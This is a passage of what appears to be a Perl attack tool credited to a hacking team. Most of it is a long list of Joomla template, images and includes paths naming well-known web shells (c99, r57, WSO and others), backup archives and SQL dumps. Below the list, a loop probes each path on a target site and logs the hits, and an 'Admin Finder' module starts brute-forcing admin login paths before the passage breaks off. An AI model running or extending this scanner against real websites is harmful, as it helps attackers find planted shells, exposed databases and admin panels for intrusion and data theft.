3426. '/templates/beez/term.php',
3427. '/templates/beez/Sec-War.php',
3428. '/templates/beez/sql.php',
3429. '/templates/beez/ssl.php',
3430. '/templates/beez/mysql.php',
3431. '/templates/beez/WolF.php',
3432. '/templates/beez/madspot.php',
3433. '/templates/beez/Cgishell.pl',
3434. '/templates/beez/killer.php',
3435. '/templates/beez/changeall.php',
3436. '/templates/beez/2.php',
3437. '/templates/beez/Sh3ll.php',
3438. '/templates/beez/dz0.php',
3439. '/templates/beez/dam.php',
3440. '/templates/beez/user.php',
3441. '/templates/beez/dom.php',
3442. '/templates/beez/whmcs.php',
3443. '/templates/beez/vb.zip',
3444. '/templates/beez/r00t.php',
3445. '/templates/beez/c99.php',
3446. '/templates/beez/gaza.php',
3447. '/templates/beez/1.php',
3448. '/templates/beez/d0mains.php',
3449. '/templates/beez/madspotshell.php',
3450. '/templates/beez/info.php',
3451. '/templates/beez/egyshell.php',
3452. '/templates/beez/Sym.php',
3453. '/templates/beez/c22.php',
3454. '/templates/beez/c100.php',
3455. '/templates/beez/configuration.php',
3456. '/templates/beez/g.php',
3457. '/templates/beez/xx.pl',
3458. '/templates/beez/ls.php',
3459. '/templates/beez/Cpanel.php',
3460. '/templates/beez/k.php',
3461. '/templates/beez/zone-h.php',
3462. '/templates/beez/tmp/user.php',
3463. '/templates/beez/tmp/Sym.php',
3464. '/templates/beez/cp.php',
3465. '/templates/beez/tmp/madspotshell.php',
3466. '/templates/beez/tmp/root.php',
3467. '/templates/beez/tmp/whmcs.php',
3468. '/templates/beez/tmp/index.php',
3469. '/templates/beez/tmp/2.php',
3470. '/templates/beez/tmp/dz.php',
3471. '/templates/beez/tmp/cpn.php',
3472. '/templates/beez/tmp/changeall.php',
3473. '/templates/beez/tmp/Cgishell.pl',
3474. '/templates/beez/tmp/sql.php',
3475. '/templates/beez/0day.php',
3476. '/templates/beez/tmp/admin.php',
3477. '/templates/beez/L3b.php',
3478. '/templates/beez/d.php',
3479. '/templates/beez/tmp/d.php',
3480. '/templates/beez/tmp/L3b.php',
3481. '/templates/beez/sado.php',
3482. '/templates/beez/admin1.php',
3483. '/templates/beez/upload.php',
3484. '/templates/beez/up.php',
3485. '/templates/beez/vb.zip',
3486. '/templates/beez/vb.rar',
3487. '/templates/beez/admin2.asp',
3488. '/templates/beez/uploads.php',
3489. '/templates/beez/sa.php',
3490. '/templates/beez/sysadmins/',
3491. '/templates/beez/admin1/',
3492. '/templates/beez/sniper.php',
3493. '/templates/beez/images/Sym.php',
3494. '/templates/beez//r57.php',
3495. '/templates/beez/gzaa_spysl',
3496. '/templates/beez/sql-new.php',
3497. '/templates/beez//shell.php',
3498. '/templates/beez//sa.php',
3499. '/templates/beez//admin.php',
3500. '/templates/beez//sa2.php',
3501. '/templates/beez//2.php',
3502. '/templates/beez//gaza.php',
3503. '/templates/beez//up.php',
3504. '/templates/beez//upload.php',
3505. '/templates/beez//uploads.php',
3506. '/templates/beez/shell.php',
3507. '/templates/beez//amad.php',
3508. '/templates/beez//t00.php',
3509. '/templates/beez//dz.php',
3510. '/templates/beez//site.rar',
3511. '/templates/beez//Black.php',
3512. '/templates/beez//site.tar.gz',
3513. '/templates/beez//home.zip',
3514. '/templates/beez//home.rar',
3515. '/templates/beez//home.tar',
3516. '/templates/beez//home.tar.gz',
3517. '/templates/beez//forum.zip',
3518. '/templates/beez//forum.rar',
3519. '/templates/beez//forum.tar',
3520. '/templates/beez//forum.tar.gz',
3521. '/templates/beez//test.txt',
3522. '/templates/beez//ftp.txt',
3523. '/templates/beez//user.txt',
3524. '/templates/beez//site.txt',
3525. '/templates/beez//error_log',
3526. '/templates/beez//error',
3527. '/templates/beez//cpanel',
3528. '/templates/beez//awstats',
3529. '/templates/beez//site.sql',
3530. '/templates/beez//vb.sql',
3531. '/templates/beez//forum.sql',
3532. '/templates/beez/r00t-s3c.php',
3533. '/templates/beez/c.php',
3534. '/templates/beez//backup.sql',
3535. '/templates/beez//back.sql',
3536. '/templates/beez//data.sql',
3537. '/templates/beez/wp.rar/',
3538. '/templates/beez/asp.aspx',
3539. '/templates/beez/tmp/vaga.php',
3540. '/templates/beez/tmp/killer.php',
3541. '/templates/beez/whmcs.php',
3542. '/templates/beez/abuhlail.php',
3543. '/templates/beez/tmp/killer.php',
3544. '/templates/beez/tmp/domaine.pl',
3545. '/templates/beez/tmp/domaine.php',
3546. '/templates/beez/useradmin/',
3547. '/templates/beez/tmp/d0maine.php',
3548. '/templates/beez/d0maine.php',
3549. '/templates/beez/tmp/sql.php',
3550. '/templates/beez/X.php',
3551. '/templates/beez/123.php',
3552. '/templates/beez/m.php',
3553. '/templates/beez/b.php',
3554. '/templates/beez/up.php',
3555. '/templates/beez/tmp/dz1.php',
3556. '/templates/beez/dz1.php',
3557. '/templates/beez/forum.zip',
3558. '/templates/beez/Symlink.php',
3559. '/templates/beez/Symlink.pl',
3560. '/templates/beez/forum.rar',
3561. '/templates/beez/joomla.zip',
3562. '/templates/beez/joomla.rar',
3563. '/templates/beez/wp.php',
3564. '/templates/beez/buck.sql',
3565. '/templates/beez/sysadmin.php',
3566. '/templates/beez/images/c99.php',
3567. '/templates/beez/xd.php',
3568. '/templates/beez/c100.php',
3569. '/templates/beez/spy.aspx',
3570. '/templates/beez/xd.php',
3571. '/templates/beez/tmp/xd.php',
3572. '/templates/beez/sym/root/home/',
3573. '/templates/beez/billing/killer.php',
3574. '/templates/beez/tmp/upload.php',
3575. '/templates/beez/tmp/admin.php',
3576. '/templates/beez/Server.php',
3577. '/templates/beez/tmp/uploads.php',
3578. '/templates/beez/tmp/up.php',
3579. '/templates/beez/Server/',
3580. '/templates/beez/wp-admin/c99.php',
3581. '/templates/beez/tmp/priv8.php',
3582. '/templates/beez/priv8.php',
3583. '/templates/beez/cgi.pl/',
3584. '/templates/beez/tmp/cgi.pl',
3585. '/templates/beez/downloads/dom.php',
3586. '/templates/beez/webadmin.html',
3587. '/templates/beez/admins.php',
3588. '/templates/beez/bluff.php',
3589. '/templates/beez/king.jeen',
3590. '/templates/beez/admins/',
3591. '/templates/beez/admins.asp',
3592. '/templates/beez/admins.php',
3593. '/templates/beez/wp.zip',
3594. '/templates/beez/index.php','/images/WSO.php',
3595. '/images/dz.php',
3596. '/images/DZ.php',
3597. '/images/cpanel.php',
3598. '/images/cpn.php',
3599. '/images/sos.php',
3600. '/images/term.php',
3601. '/images/Sec-War.php',
3602. '/images/sql.php',
3603. '/images/ssl.php',
3604. '/images/mysql.php',
3605. '/images/WolF.php',
3606. '/images/madspot.php',
3607. '/images/Cgishell.pl',
3608. '/images/killer.php',
3609. '/images/changeall.php',
3610. '/images/2.php',
3611. '/images/Sh3ll.php',
3612. '/images/dz0.php',
3613. '/images/dam.php',
3614. '/images/user.php',
3615. '/images/dom.php',
3616. '/images/whmcs.php',
3617. '/images/vb.zip',
3618. '/images/r00t.php',
3619. '/images/c99.php',
3620. '/images/gaza.php',
3621. '/images/1.php',
3622. '/images/d0mains.php',
3623. '/images/madspotshell.php',
3624. '/images/info.php',
3625. '/images/egyshell.php',
3626. '/images/Sym.php',
3627. '/images/c22.php',
3628. '/images/c100.php',
3629. '/images/configuration.php',
3630. '/images/g.php',
3631. '/images/xx.pl',
3632. '/images/ls.php',
3633. '/images/Cpanel.php',
3634. '/images/k.php',
3635. '/images/zone-h.php',
3636. '/images/tmp/user.php',
3637. '/images/tmp/Sym.php',
3638. '/images/cp.php',
3639. '/images/tmp/madspotshell.php',
3640. '/images/tmp/root.php',
3641. '/images/tmp/whmcs.php',
3642. '/images/tmp/index.php',
3643. '/images/tmp/2.php',
3644. '/images/tmp/dz.php',
3645. '/images/tmp/cpn.php',
3646. '/images/tmp/changeall.php',
3647. '/images/tmp/Cgishell.pl',
3648. '/images/tmp/sql.php',
3649. '/images/0day.php',
3650. '/images/tmp/admin.php',
3651. '/images/L3b.php',
3652. '/images/d.php',
3653. '/images/tmp/d.php',
3654. '/images/tmp/L3b.php',
3655. '/images/sado.php',
3656. '/images/admin1.php',
3657. '/images/upload.php',
3658. '/images/up.php',
3659. '/images/vb.zip',
3660. '/images/vb.rar',
3661. '/images/admin2.asp',
3662. '/images/uploads.php',
3663. '/images/sa.php',
3664. '/images/sysadmins/',
3665. '/images/admin1/',
3666. '/images/sniper.php',
3667. '/images/images/Sym.php',
3668. '/images//r57.php',
3669. '/images/gzaa_spysl',
3670. '/images/sql-new.php',
3671. '/images//shell.php',
3672. '/images//sa.php',
3673. '/images//admin.php',
3674. '/images//sa2.php',
3675. '/images//2.php',
3676. '/images//gaza.php',
3677. '/images//up.php',
3678. '/images//upload.php',
3679. '/images//uploads.php',
3680. '/images/shell.php',
3681. '/images//amad.php',
3682. '/images//t00.php',
3683. '/images//dz.php',
3684. '/images//site.rar',
3685. '/images//Black.php',
3686. '/images//site.tar.gz',
3687. '/images//home.zip',
3688. '/images//home.rar',
3689. '/images//home.tar',
3690. '/images//home.tar.gz',
3691. '/images//forum.zip',
3692. '/images//forum.rar',
3693. '/images//forum.tar',
3694. '/images//forum.tar.gz',
3695. '/images//test.txt',
3696. '/images//ftp.txt',
3697. '/images//user.txt',
3698. '/images//site.txt',
3699. '/images//error_log',
3700. '/images//error',
3701. '/images//cpanel',
3702. '/images//awstats',
3703. '/images//site.sql',
3704. '/images//vb.sql',
3705. '/images//forum.sql',
3706. '/images/r00t-s3c.php',
3707. '/images/c.php',
3708. '/images//backup.sql',
3709. '/images//back.sql',
3710. '/images//data.sql',
3711. '/images/wp.rar/',
3712. '/images/asp.aspx',
3713. '/images/tmp/vaga.php',
3714. '/images/tmp/killer.php',
3715. '/images/whmcs.php',
3716. '/images/abuhlail.php',
3717. '/images/tmp/killer.php',
3718. '/images/tmp/domaine.pl',
3719. '/images/tmp/domaine.php',
3720. '/images/useradmin/',
3721. '/images/tmp/d0maine.php',
3722. '/images/d0maine.php',
3723. '/images/tmp/sql.php',
3724. '/images/X.php',
3725. '/images/123.php',
3726. '/images/m.php',
3727. '/images/b.php',
3728. '/images/up.php',
3729. '/images/tmp/dz1.php',
3730. '/images/dz1.php',
3731. '/images/forum.zip',
3732. '/images/Symlink.php',
3733. '/images/Symlink.pl',
3734. '/images/forum.rar',
3735. '/images/joomla.zip',
3736. '/images/joomla.rar',
3737. '/images/wp.php',
3738. '/images/buck.sql',
3739. '/includes/WSO.php',
3740. '/includes/dz.php',
3741. '/includes/DZ.php',
3742. '/includes/cpanel.php',
3743. '/includes/cpn.php',
3744. '/includes/sos.php',
3745. '/includes/term.php',
3746. '/includes/Sec-War.php',
3747. '/includes/sql.php',
3748. '/includes/ssl.php',
3749. '/includes/mysql.php',
3750. '/includes/WolF.php',
3751. '/includes/madspot.php',
3752. '/includes/Cgishell.pl',
3753. '/includes/killer.php',
3754. '/includes/changeall.php',
3755. '/includes/2.php',
3756. '/includes/Sh3ll.php',
3757. '/includes/dz0.php',
3758. '/includes/dam.php',
3759. '/includes/user.php',
3760. '/includes/dom.php',
3761. '/includes/whmcs.php',
3762. '/includes/vb.zip',
3763. '/includes/r00t.php',
3764. '/includes/c99.php',
3765. '/includes/gaza.php',
3766. '/includes/1.php',
3767. '/includes/d0mains.php',
3768. '/includes/madspotshell.php',
3769. '/includes/info.php',
3770. '/includes/egyshell.php',
3771. '/includes/Sym.php',
3772. '/includes/c22.php',
3773. '/includes/c100.php',
3774. '/includes/configuration.php',
3775. '/includes/g.php',
3776. '/includes/xx.pl',
3777. '/includes/ls.php',
3778. '/includes/Cpanel.php',
3779. '/includes/k.php',
3780. '/includes/zone-h.php',
3781. '/includes/tmp/user.php',
3782. '/includes/tmp/Sym.php',
3783. '/includes/cp.php',
3784. '/includes/tmp/madspotshell.php',
3785. '/includes/tmp/root.php',
3786. '/includes/tmp/whmcs.php',
3787. '/includes/tmp/index.php',
3788. '/includes/tmp/2.php',
3789. '/includes/tmp/dz.php',
3790. '/includes/tmp/cpn.php',
3791. '/includes/tmp/changeall.php',
3792. '/includes/tmp/Cgishell.pl',
3793. '/includes/tmp/sql.php',
3794. '/includes/0day.php',
3795. '/includes/tmp/admin.php',
3796. '/includes/L3b.php',
3797. '/includes/d.php',
3798. '/includes/tmp/d.php',
3799. '/includes/tmp/L3b.php',
3800. '/includes/sado.php',
3801. '/includes/admin1.php',
3802. '/includes/upload.php',
3803. '/includes/up.php',
3804. '/includes/vb.zip',
3805. '/includes/vb.rar',
3806. '/includes/admin2.asp',
3807. '/includes/uploads.php',
3808. '/includes/sa.php',
3809. '/includes/sysadmins/',
3810. '/includes/admin1/',
3811. '/includes/sniper.php',
3812. '/includes/images/Sym.php',
3813. '/includes//r57.php',
3814. '/includes/gzaa_spysl',
3815. '/includes/sql-new.php',
3816. '/includes//shell.php',
3817. '/includes//sa.php',
3818. '/includes//admin.php',
3819. '/includes//sa2.php',
3820. '/includes//2.php',
3821. '/includes//gaza.php',
3822. '/includes//up.php',
3823. '/includes//upload.php',
3824. '/includes//uploads.php',
3825. '/includes/shell.php',
3826. '/includes//amad.php',
3827. '/includes//t00.php',
3828. '/includes//dz.php',
3829. '/includes//site.rar',
3830. '/includes//Black.php',
3831. '/includes//site.tar.gz',
3832. '/includes//home.zip',
3833. '/includes//home.rar',
3834. '/includes//home.tar',
3835. '/includes//home.tar.gz',
3836. '/includes//forum.zip',
3837. '/includes//forum.rar',
3838. '/includes//forum.tar',
3839. '/includes//forum.tar.gz',
3840. '/includes//test.txt',
3841. '/includes//ftp.txt',
3842. '/includes//user.txt',
3843. '/includes//site.txt',
3844. '/includes//error_log',
3845. '/includes//error',
3846. '/includes//cpanel',
3847. '/includes//awstats',
3848. '/includes//site.sql',
3849. '/includes//vb.sql',
3850. '/includes//forum.sql',
3851. '/includes/r00t-s3c.php',
3852. '/includes/c.php',
3853. '/includes//backup.sql',
3854. '/includes//back.sql',
3855. '/includes//data.sql',
3856. '/includes/wp.rar/',
3857. '/includes/asp.aspx',
3858. '/includes/tmp/vaga.php',
3859. '/includes/tmp/killer.php',
3860. '/includes/whmcs.php',
3861. '/includes/abuhlail.php',
3862. '/includes/tmp/killer.php',
3863. '/includes/tmp/domaine.pl',
3864. '/includes/tmp/domaine.php',
3865. '/includes/useradmin/',
3866. '/includes/tmp/d0maine.php',
3867. '/includes/d0maine.php',
3868. '/includes/tmp/sql.php',
3869. '/includes/X.php',
3870. '/includes/123.php',
3871. '/includes/m.php',
3872. '/includes/b.php',
3873. '/includes/up.php',
3874. '/includes/tmp/dz1.php',
3875. '/includes/dz1.php',
3876. '/includes/forum.zip',
3877. '/includes/Symlink.php',
3878. '/includes/Symlink.pl',
3879. '/includes/forum.rar',
3880. '/includes/joomla.zip',
3881. '/includes/joomla.rar',
3882. '/includes/wp.php',
3883. '/includes/buck.sql',
3884. '/includes/sysadmin.php',
3885. '/includes/images/c99.php',
3886. '/includes/xd.php',
3887. '/includes/c100.php',
3888. '/includes/spy.aspx',
3889. '/includes/xd.php',
3890. '/includes/tmp/xd.php',
3891. '/includes/sym/root/home/',
3892. '/includes/billing/killer.php',
3893. '/includes/tmp/upload.php',
3894. '/includes/tmp/admin.php',
3895. '/includes/Server.php',
3896. '/includes/tmp/uploads.php',
3897. '/includes/tmp/up.php',
3898. '/includes/Server/',
3899. '/includes/wp-admin/c99.php',
3900. '/includes/tmp/priv8.php',
3901. '/includes/priv8.php',
3902. '/includes/cgi.pl/',
3903. '/includes/tmp/cgi.pl',
3904. '/includes/downloads/dom.php',
3905. '/includes/webadmin.html',
3906. '/includes/admins.php',
3907. '/includes/bluff.php',
3908. '/includes/king.jeen',
3909. '/includes/admins/',
3910. '/includes/admins.asp',
3911. '/includes/admins.php',
3912. '/includes/wp.zip',
3913. '/includes/',
3914. '/templates/rhuk_milkyway/WSO.php',
3915. '/templates/rhuk_milkyway/dz.php',
3916. '/templates/rhuk_milkyway/DZ.php',
3917. '/templates/rhuk_milkyway/cpanel.php',
3918. '/templates/rhuk_milkyway/cpn.php',
3919. '/templates/rhuk_milkyway/sos.php',
3920. '/templates/rhuk_milkyway/term.php',
3921. '/templates/rhuk_milkyway/Sec-War.php',
3922. '/templates/rhuk_milkyway/sql.php',
3923. '/templates/rhuk_milkyway/ssl.php',
3924. '/templates/rhuk_milkyway/mysql.php',
3925. '/templates/rhuk_milkyway/WolF.php',
3926. '/templates/rhuk_milkyway/madspot.php',
3927. '/templates/rhuk_milkyway/Cgishell.pl',
3928. '/templates/rhuk_milkyway/killer.php',
3929. '/templates/rhuk_milkyway/changeall.php',
3930. '/templates/rhuk_milkyway/2.php',
3931. '/templates/rhuk_milkyway/Sh3ll.php',
3932. '/templates/rhuk_milkyway/dz0.php',
3933. '/templates/rhuk_milkyway/dam.php',
3934. '/templates/rhuk_milkyway/user.php',
3935. '/templates/rhuk_milkyway/dom.php',
3936. '/templates/rhuk_milkyway/whmcs.php',
3937. '/templates/rhuk_milkyway/vb.zip',
3938. '/templates/rhuk_milkyway/r00t.php',
3939. '/templates/rhuk_milkyway/c99.php',
3940. '/templates/rhuk_milkyway/gaza.php',
3941. '/templates/rhuk_milkyway/1.php',
3942. '/templates/rhuk_milkyway/d0mains.php',
3943. '/templates/rhuk_milkyway/madspotshell.php',
3944. '/templates/rhuk_milkyway/info.php',
3945. '/templates/rhuk_milkyway/egyshell.php',
3946. '/templates/rhuk_milkyway/Sym.php',
3947. '/templates/rhuk_milkyway/c22.php',
3948. '/templates/rhuk_milkyway/c100.php',
3949. '/templates/rhuk_milkyway/configuration.php',
3950. '/templates/rhuk_milkyway/g.php',
3951. '/templates/rhuk_milkyway/xx.pl',
3952. '/templates/rhuk_milkyway/ls.php',
3953. '/templates/rhuk_milkyway/Cpanel.php',
3954. '/templates/rhuk_milkyway/k.php',
3955. '/templates/rhuk_milkyway/zone-h.php',
3956. '/templates/rhuk_milkyway/tmp/user.php',
3957. '/templates/rhuk_milkyway/tmp/Sym.php',
3958. '/templates/rhuk_milkyway/cp.php',
3959. '/templates/rhuk_milkyway/tmp/madspotshell.php',
3960. '/templates/rhuk_milkyway/tmp/root.php',
3961. '/templates/rhuk_milkyway/tmp/whmcs.php',
3962. '/templates/rhuk_milkyway/tmp/index.php',
3963. '/templates/rhuk_milkyway/tmp/2.php',
3964. '/templates/rhuk_milkyway/tmp/dz.php',
3965. '/templates/rhuk_milkyway/tmp/cpn.php',
3966. '/templates/rhuk_milkyway/tmp/changeall.php',
3967. '/templates/rhuk_milkyway/tmp/Cgishell.pl',
3968. '/templates/rhuk_milkyway/tmp/sql.php',
3969. '/templates/rhuk_milkyway/0day.php',
3970. '/templates/rhuk_milkyway/tmp/admin.php',
3971. '/templates/rhuk_milkyway/L3b.php',
3972. '/templates/rhuk_milkyway/d.php',
3973. '/templates/rhuk_milkyway/tmp/d.php',
3974. '/templates/rhuk_milkyway/tmp/L3b.php',
3975. '/templates/rhuk_milkyway/sado.php',
3976. '/templates/rhuk_milkyway/admin1.php',
3977. '/templates/rhuk_milkyway/upload.php',
3978. '/templates/rhuk_milkyway/up.php',
3979. '/templates/rhuk_milkyway/vb.zip',
3980. '/templates/rhuk_milkyway/vb.rar',
3981. '/templates/rhuk_milkyway/admin2.asp',
3982. '/templates/rhuk_milkyway/uploads.php',
3983. '/templates/rhuk_milkyway/sa.php',
3984. '/templates/rhuk_milkyway/sysadmins/',
3985. '/templates/rhuk_milkyway/admin1/',
3986. '/templates/rhuk_milkyway/sniper.php',
3987. '/templates/rhuk_milkyway/images/Sym.php',
3988. '/templates/rhuk_milkyway//r57.php',
3989. '/templates/rhuk_milkyway/gzaa_spysl',
3990. '/templates/rhuk_milkyway/sql-new.php',
3991. '/templates/rhuk_milkyway//shell.php',
3992. '/templates/rhuk_milkyway//sa.php',
3993. '/templates/rhuk_milkyway//admin.php',
3994. '/templates/rhuk_milkyway//sa2.php',
3995. '/templates/rhuk_milkyway//2.php',
3996. '/templates/rhuk_milkyway//gaza.php',
3997. '/templates/rhuk_milkyway//up.php',
3998. '/templates/rhuk_milkyway//upload.php',
3999. '/templates/rhuk_milkyway//uploads.php',
4000. '/templates/rhuk_milkyway/shell.php',
4001. '/templates/rhuk_milkyway//amad.php',
4002. '/templates/rhuk_milkyway//t00.php',
4003. '/templates/rhuk_milkyway//dz.php',
4004. '/templates/rhuk_milkyway//site.rar',
4005. '/templates/rhuk_milkyway//Black.php',
4006. '/templates/rhuk_milkyway//site.tar.gz',
4007. '/templates/rhuk_milkyway//home.zip',
4008. '/templates/rhuk_milkyway//home.rar',
4009. '/templates/rhuk_milkyway//home.tar',
4010. '/templates/rhuk_milkyway//home.tar.gz',
4011. '/templates/rhuk_milkyway//forum.zip',
4012. '/templates/rhuk_milkyway//forum.rar',
4013. '/templates/rhuk_milkyway//forum.tar',
4014. '/templates/rhuk_milkyway//forum.tar.gz',
4015. '/templates/rhuk_milkyway//test.txt',
4016. '/templates/rhuk_milkyway//ftp.txt',
4017. '/templates/rhuk_milkyway//user.txt',
4018. '/templates/rhuk_milkyway//site.txt',
4019. '/templates/rhuk_milkyway//error_log',
4020. '/templates/rhuk_milkyway//error',
4021. '/templates/rhuk_milkyway//cpanel',
4022. '/templates/rhuk_milkyway//awstats',
4023. '/templates/rhuk_milkyway//site.sql',
4024. '/templates/rhuk_milkyway//vb.sql',
4025. '/templates/rhuk_milkyway//forum.sql',
4026. '/templates/rhuk_milkyway/r00t-s3c.php',
4027. '/templates/rhuk_milkyway/c.php',
4028. '/templates/rhuk_milkyway//backup.sql',
4029. '/templates/rhuk_milkyway//back.sql',
4030. '/templates/rhuk_milkyway//data.sql',
4031. '/templates/rhuk_milkyway/wp.rar/',
4032. '/templates/rhuk_milkyway/asp.aspx',
4033. '/templates/rhuk_milkyway/tmp/vaga.php',
4034. '/templates/rhuk_milkyway/tmp/killer.php',
4035. '/templates/rhuk_milkyway/whmcs.php',
4036. '/templates/rhuk_milkyway/abuhlail.php',
4037. '/templates/rhuk_milkyway/tmp/killer.php',
4038. '/templates/rhuk_milkyway/tmp/domaine.pl',
4039. '/templates/rhuk_milkyway/tmp/domaine.php',
4040. '/templates/rhuk_milkyway/useradmin/',
4041. '/templates/rhuk_milkyway/tmp/d0maine.php',
4042. '/templates/rhuk_milkyway/d0maine.php',
4043. '/templates/rhuk_milkyway/tmp/sql.php',
4044. '/templates/rhuk_milkyway/X.php',
4045. '/templates/rhuk_milkyway/123.php',
4046. '/templates/rhuk_milkyway/m.php',
4047. '/templates/rhuk_milkyway/b.php',
4048. '/templates/rhuk_milkyway/up.php',
4049. '/templates/rhuk_milkyway/tmp/dz1.php',
4050. '/templates/rhuk_milkyway/dz1.php',
4051. '/templates/rhuk_milkyway/forum.zip',
4052. '/templates/rhuk_milkyway/Symlink.php',
4053. '/templates/rhuk_milkyway/Symlink.pl',
4054. '/templates/rhuk_milkyway/forum.rar',
4055. '/templates/rhuk_milkyway/joomla.zip',
4056. '/templates/rhuk_milkyway/joomla.rar',
4057. '/templates/rhuk_milkyway/wp.php',
4058. '/templates/rhuk_milkyway/buck.sql',
4059. '/templates/rhuk_milkyway/sysadmin.php',
4060. '/templates/rhuk_milkyway/images/c99.php',
4061. '/templates/rhuk_milkyway/xd.php',
4062. '/templates/rhuk_milkyway/c100.php',
4063. '/templates/rhuk_milkyway/spy.aspx',
4064. '/templates/rhuk_milkyway/xd.php',
4065. '/templates/rhuk_milkyway/tmp/xd.php',
4066. '/templates/rhuk_milkyway/sym/root/home/',
4067. '/templates/rhuk_milkyway/billing/killer.php',
4068. '/templates/rhuk_milkyway/tmp/upload.php',
4069. '/templates/rhuk_milkyway/tmp/admin.php',
4070. '/templates/rhuk_milkyway/Server.php',
4071. '/templates/rhuk_milkyway/tmp/uploads.php',
4072. '/templates/rhuk_milkyway/tmp/up.php',
4073. '/templates/rhuk_milkyway/Server/',
4074. '/templates/rhuk_milkyway/wp-admin/c99.php',
4075. '/templates/rhuk_milkyway/tmp/priv8.php',
4076. '/templates/rhuk_milkyway/priv8.php',
4077. '/templates/rhuk_milkyway/cgi.pl/',
4078. '/templates/rhuk_milkyway/tmp/cgi.pl',
4079. '/templates/rhuk_milkyway/downloads/dom.php',
4080. '/templates/rhuk_milkyway/webadmin.html',
4081. '/templates/rhuk_milkyway/admins.php',
4082. '/templates/rhuk_milkyway/bluff.php',
4083. '/templates/rhuk_milkyway/king.jeen',
4084. '/templates/rhuk_milkyway/admins/',
4085. '/templates/rhuk_milkyway/admins.asp',
4086. '/templates/rhuk_milkyway/admins.php',
4087. '/templates/rhuk_milkyway/wp.zip',
4088. '/templates/rhuk_milkyway/','WSO.php',
4089. 'a.php',
4090. 'z.php',
4091. 'e.php',
4092. 'r.php',
4093. 't.php',
4094. 'y.php',
4095. 'u.php',
4096. 'i.php',
4097. 'o.php',
4098. 'p.php',
4099. 'q.php',
4100. 's.php',
4101. 'd.php',
4102. 'f.php',
4103. 'g.php',
4104. 'h.php',
4105. 'j.php',
4106. 'k.php',
4107. 'l.php',
4108. 'm.php',
4109. 'w.php',
4110. 'x.php',
4111. 'c.php',
4112. 'v.php',
4113. 'b.php',
4114. 'n.php',
4115. '1.php',
4116. '2.php',
4117. '3.php',
4118. '4.php',
4119. '5.php',
4120. '6.php',
4121. '7.php',
4122. '8.php',
4123. '9.php',
4124. '10.php',
4125. '12.php',
4126. '11.php',
4127. '1234.php',);
4128.  
4129.  
4130. foreach $com(@path){
4131.  
4132. $url = $site.$com;
4133. $req = HTTP::Request->new(GET=>$url);
4134. $useragent = LWP::UserAgent->new();
4135.  
4136. $response = $useragent->request($req);
4137.  
4138. if ($response->is_success){
4139. print "$com\n";
4140. $url = substr($url, $com + 13);
4141. $com = substr($url, 0, index($url, '"'));
4142. open (txt,">>done.txt");
4143. print txt  $com,"\n";
4144. close(txt);
4145. print "=> Dir Found : $url\n";
4146. }
4147. else {
4148. print "=> Not Found : $com\n";
4149. }
4150. }}
4151. }
4152. if($targett eq '2')
4153. {
4154. system('cls');
4155. system('title Admin Finder');
4156.                    {
4157.                        print " Admin Finder \n";
4158. use HTTP::Request;
4159. use LWP::UserAgent;
4160.  
4161. system('cls');
4162. system('title Admin Finder Rec0ded by Fallag crx');
4163.  
4164. print"\n";
4165. print "--------------------------------------------------------\n" ;
4166. print "[*]----------Admin Finder Rec0ded by Fallag crx--------[*]\n" ;
4167. print "[*]-------------    ReCoded By Fallag crx    ----------[*]\n" ;
4168. print "[*]------            Fallaga  Team            ---------[*]\n" ;
4169. print "********************************************************\n" ;
4170. print "\n";
4171.  
4172. print "~# Enter The Site\n* ex: www.domaine.com ou www.domaine.com/path\n-> ";
4173. $site=<STDIN>;
4174. chomp $site;
4175.  
4176. print "\n";
4177. print "~ Enter Type The Site \n* ex: asp, php, cfm\n-> ";
4178. $code=<STDIN>;
4179. chomp($code);
4180.  
4181. if ( $site !~ /^http:/ ) {
4182. $site = 'http://' . $site;
4183. }
4184. if ( $site !~ /\/$/ ) {
4185. $site = $site . '/';
4186. }
4187. print "\n";
4188.  
4189. print "->Your Target: $site\n";
4190. print "->Type Website: $code\n";
4191. print "->Loading\n\n\n";
4192.  
4193. if($code eq "asp"){
4194.  
4195. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
4196. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
4197. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
4198. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
4199. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
4200. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
4201. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
4202. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
4203. 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
4204. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
4205. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
4206. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
4207. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
4208. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
4209. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
4210. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
4211. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
4212. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
4213. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
4214. );
4215.  
4216. foreach $ways(@path1){
4217.  
4218. $final=$site.$ways;
4219.  
